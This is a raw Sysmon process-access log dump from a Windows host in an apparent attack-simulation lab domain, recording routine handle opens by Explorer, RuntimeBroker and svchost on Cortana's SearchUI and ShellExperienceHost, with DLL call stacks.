07:54:06.711{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.711{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.696{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.680{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.680{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.665{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.665{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001049473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.649{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.649{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.633{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.633{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.633{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.633{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.631{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.631{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.631{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.631{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.630{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.629{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.628{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.627{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 